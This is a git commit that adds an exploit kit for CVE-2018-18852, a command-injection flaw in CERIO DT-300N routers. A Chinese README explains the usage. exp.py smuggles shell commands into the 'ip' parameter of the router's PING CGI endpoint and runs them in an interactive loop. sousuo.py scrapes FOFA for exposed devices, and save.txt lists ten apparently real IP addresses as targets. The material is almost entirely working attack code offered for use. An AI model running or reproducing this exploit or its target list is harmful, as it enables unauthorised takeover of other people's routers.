Add files via upload

jiushill · web-flow · commit d99aa35614aa · 2019-01-30T14:14:49.000+08:00
diff --git a/CVE-2018-18852/README.md b/CVE-2018-18852/README.md
@@ -0,0 +1,11 @@
+如果你想获取测试IP：直接执行sousuo.py，他会从fofa.so抓取1页的IP
+
+漏洞利用：
+``````
+python3 exp.py
+填入漏洞的IP
+
+端口
+
+账户
+``````
diff --git a/CVE-2018-18852/exp.py b/CVE-2018-18852/exp.py
@@ -0,0 +1,82 @@
+#author:九世
+#time:2019/1/30
+
+import requests
+import json
+import base64
+
+class Demo:
+    def __init__(self,headers,url,payload,url2):
+        self.headers=headers
+        self.url=url
+        self.payload=payload
+        self.url2=url2
+
+    def requet(self):
+        ver = 'DT-300N-NGS-M'
+        ver2='DT-300N'
+        version=''
+        vurl=''
+        rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
+        nurl=''
+        nersion=''
+        if rqt.status_code==requests.codes.ok:
+            print('[+] Router version number is {}'.format(ver))
+            while True:
+                rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
+                nurl+=rqt.url
+                nersion+=ver
+                nary=json.loads(rqt.content)
+                cmd = input('command：')
+                payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': nary['pid'], 'Times': 1}
+                self.command(self.url, headers, payload,nersion)
+
+        elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404
+            print('[-] Router version number is not {}'.format(ver))
+            rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
+            if rqts.status_code==requests.codes.ok:
+                print('[+] Router version number is {}'.format(ver2))
+                while True:
+                    rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
+                    version+=ver2
+                    vurl+=rqts.url
+                    vary=json.loads(rqts.content)
+                    cmd=input('command：')
+                    payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': vary, 'Times': 1}
+                    self.command(self.url2,headers,payload,version)
+            elif rqts.status_code==requests.codes.not_found:
+                print('[-] Router version number is not {}'.format(ver2))
+                exit()
+            elif rqts.status_code==requests.codes.unauthorized:
+                print('[-] Auth is invalid, try other creds')
+                exit()
+
+    def command(self,url,header,data,ver):
+        rsv=requests.post(url=url,headers=header,data=data)
+        if ver=='DT-300N':
+            print(rsv.text.split('/html')[1])
+        else:
+            print(rsv.text.split('[[[')[1])
+if __name__ == '__main__':
+    print('[&] The version of CERIO that is vulnerable is as follows')
+    print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
+    print('')
+    t=''
+    path='/cgi-bin/main.cgi?cgi=PING&mode=9'
+    path2='/cgi-bin/Save.cgi?cgi=PING'
+    user=input('host:').strip()
+    ports=input('port:').strip()
+    username=input('creds:').strip()
+    creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
+    if ports in '443':
+        t+='https://'
+    else:
+        t+='http://'
+
+
+    urls=t+user+':'+ports+path
+    urls2=t+user+':'+ports+path2
+    payload={'cgi':'PING','mode':9}
+    headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
+    obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
+    obj.requet()
diff --git a/CVE-2018-18852/save.txt b/CVE-2018-18852/save.txt
@@ -0,0 +1,10 @@
+1.173.33.86
+36.233.167.168
+61.227.186.39
+36.234.145.128
+1.175.130.77
+61.223.178.171
+1.175.58.177
+36.224.215.199
+118.165.7.180
+219.86.30.66
diff --git a/CVE-2018-18852/sousuo.py b/CVE-2018-18852/sousuo.py
@@ -0,0 +1,35 @@
+#author:九世
+#time:2019/1/29
+
+import requests
+import os
+import re
+from bs4 import *
+
+
+xj=open('save.txt','w')
+xj.close()
+
+class Fofa:
+    def __init__(self,headers,url):
+        self.headers=headers
+        self.url=url
+
+    def requet(self):
+        try:
+            rqt=requests.get(url=self.url,headers=self.headers)
+            zz=re.findall('<a target="_blank" href=".*">.* <i class="fa fa-link"></i></a>',rqt.text)
+            for z in zz:
+                href=BeautifulSoup(str(z),'html.parser')
+                for q in href.find_all('a'):
+                    host=q.get('href')
+                    print('[+]IP:'+str(host).replace('http://','').replace('https://','').lstrip())
+                    print(str(host).replace('http://', '').replace('https://', '').lstrip(),file=open('save.txt','a'))
+        except Exception as r:
+            print('[!] Error {}'.format(r))
+
+if __name__ == '__main__':
+    headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
+    url='https://fofa.so/result?qbase64=YXBwPSJjZXJpb19EVDMwME4i'
+    obj=Fofa(headers=headers,url=url)
+    obj.requet()
